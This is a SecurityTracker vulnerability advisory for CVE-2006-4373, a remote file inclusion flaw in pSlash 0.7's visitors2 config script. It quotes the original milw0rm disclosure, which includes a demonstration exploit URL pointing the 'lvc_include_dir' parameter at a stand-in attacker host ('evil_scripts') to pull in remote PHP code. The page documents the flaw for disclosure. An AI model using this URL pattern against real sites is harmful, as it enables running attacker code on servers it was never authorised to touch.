SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   pSlash Vendors:   pslash.sourceforge.net
pSlash Include File Bug in 'config.inc.php' Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1016752
SecurityTracker URL:  http://securitytracker.com/id/1016752
CVE Reference:   CVE-2006-4373   (Links to External Site)
Updated:  Jun 8 2008
Original Entry Date:  Aug 25 2006
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 0.7
Description:   A vulnerability was reported in pSlash. A remote user can include and execute arbitrary code on the target system.

The 'modules/visitors2/include/config.inc.php' script does not properly validate user-supplied input in the 'lvc_include_dir' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided:

http://[target]/[path]/modules/visitors2/include/config.inc.php?lvc_include_dir=http://evil_scripts?

XORON reported this vulnerability.

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  sourceforge.net/projects/pslash/ (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  pSlash v0.7 (lvc_include_dir) Remote Include Vulnerability

############################################################


pSlash v0.7 (lvc_include_dir) Remote Include Vulnerability


############################################################


#Author: XORON


############################################################


#Class: Remote


############################################################


#cont@ct: x0r0n[at]hotmail[dot]com


############################################################


#Code:  require($lvc_include_dir.'db/db_mysql.inc.php');


############################################################


#Exploit:

http://www.site.com/[path]/modules/visitors2/include/config.inc.php?lvc_include_dir=http://evil_scripts?


############################################################


#Greetz: str0ke, Ironfist, Preddy, sakkkure


############################################################


# milw0rm.com [2006-08-23]


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC